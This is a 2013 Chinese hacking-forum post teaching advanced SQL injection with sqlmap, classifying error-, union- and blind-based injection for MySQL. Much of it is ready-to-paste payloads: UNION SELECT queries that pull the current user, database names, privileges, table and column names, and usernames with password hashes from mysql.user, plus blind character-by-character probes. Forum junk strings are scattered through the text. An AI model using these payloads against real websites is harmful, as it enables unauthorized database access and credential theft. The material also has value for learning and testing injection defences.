找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2726|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。6 O' K7 M% W& P1 h' `8 r( V

/ c5 l' |, X/ Q& A! A) E这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表2 `. @$ g( ^& {0 G; p6 O9 ?0 D

7 U; O! ~/ [5 M0 u4 Z分类标准        分类        备注
- ~+ [. D' b6 J按字段类型        整型注入,字符型注入        3 t. V/ j/ q, J* Q& ~
按出现的位置        get注入,post注入,cookie注入,http header注入       
7 `2 C7 o# V8 B' C( I然而高级注入是这样的
' a0 Z5 p& ?' q- V' G2 ?
/ S3 U7 p; A- D& W! z5 O$ t3 |高级注入分类        条件
5 M- q: E, J' w9 }error-based sql        数据库的错误回显可以返回,存在数据库,表结构
; C0 g6 P/ p* q3 C. U5 N$ @. lunion-based sql        能够使用union,存在数据库,表结构
( N8 D+ V. }* z5 i& y1 a% _8 L3 Lblind sql        存在注入
- g. ]0 U  Z: {) Y. F! G6 E+ y8 S我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。  u, t! c3 M: i9 s1 ~% f
+ d* [9 ]0 r5 r
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火( e3 X0 o4 ^6 P5 M" G/ `- c5 V, M7 [
5 [" }, k& v% [! r
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
7 A* p) K$ A; e ! y) s$ H; _; W7 q, k2 ]  d$ Z
这里用mysql说明
, b  K. R- m1 ^: u + z" W7 }$ }) U9 d* z  }
e注入坛子里很多了,请看戳我或者再戳我% F0 Y4 U) l: q$ G" `

. [* }% q3 F& Z. L/ Cu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
* k  B) l% Z8 K, x6 [; R' c 4 Y5 [" N; H3 W7 |7 p
获取当前数据库用户名# T1 n& F7 }, n
) v6 z3 W- Z# D* {
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
( U3 E* A( ^, K8 S, K( GAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
/ e+ O0 {' B- x6 \& Z5 S0 ?! ]& c7 EL, NULL#
4 a/ j" C7 @$ M4 q* T: R4 j: W! {注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。8 I7 H5 z! E( u1 t: l% m% z
6 ^$ d4 l2 u& w' S7 P+ y8 a  F
获取数据库名9 w2 ~1 B8 ?/ k' [9 O& v0 ^: [$ P% m

/ l' s9 G/ X3 N, B/ r+ d/ fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
7 J# U0 R0 s, \1 c3 F. R* u% A8 a获取所有用户名9 b* ^8 I( Y; H4 o- K6 Q

0 N) U5 G# }7 a8 u% C1 n6 |* iUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#. W6 X1 B! g" |. d/ O0 Y1 m
查看当前用户权限
" q( Q0 R: t4 b1 Y8 o
  K4 j+ S3 P& S0 LUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#' R3 Y& v, L" ^# U2 g/ B5 A
尝试获取密码,当然需要有能读mysql数据库的权限
9 v0 B( u' x  Q+ h" _/ e/ M
2 ^/ S! ~: S% RUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#5 d2 Q$ ?( h4 d9 e$ _: E2 n3 k. I
获取表名,limit什么的自己搞啦
2 B1 T4 C! q# a9 }  M& {4 K7 b# ^8 l 8 {2 h) o% e' w2 h2 \! ^6 V; o
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
8 V- n! p- ?: G1 Z7 V- c获取字段名及其类型
4 e, @; O( T- Q" [! AUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#. b( E& w; T% K2 d$ ^

% E7 z# P' F& L1 Sb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。8 }1 a3 L  g+ ?2 N# k

7 T1 V# f) l4 r4 P' q如:5 @5 l( @, x9 ]# W% J, P* h
获取当前用户名6 E. P, ^" G: ?( A+ V
: X, \% E2 ?; f6 ^. J
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
* c- K  {" d0 c. n, [6 j获取当前数据库9 o' B8 v  e) W6 g- o. ^
- e5 t" x% e2 D0 t4 S9 H
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
! o5 c5 v* x8 E获取表名* U9 w% F0 C; H  F' t+ Z
6 f- r0 s* ~. g3 m' E2 K
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
; s" P+ \  b0 q1 t7 k! g获取字段名及其类型和爆内容就不说了,改改上面的就可以了。6 f/ G, K0 p0 L7 _( p5 W# w
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
; I! h7 W3 x5 B7 `$ }爆表
0 q& C# W3 N% \# H" u
, ~% K7 e: s6 h; C- H1 P* x+ hAND EXISTS(select * from table)
9 ?8 O( i, y' m" s爆字段7 G4 {1 O! j1 S- u! f) s: a, g

+ ^( l" o! L; E. uAND EXISTS(select pwd from table)# }/ C* t' [1 o. y6 @
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
# h0 @& a4 q4 s- K% z& [ ! W3 c3 H: w$ E0 s! e. d2 N# g" d
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
* x2 h  ~& J, I  R$ ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表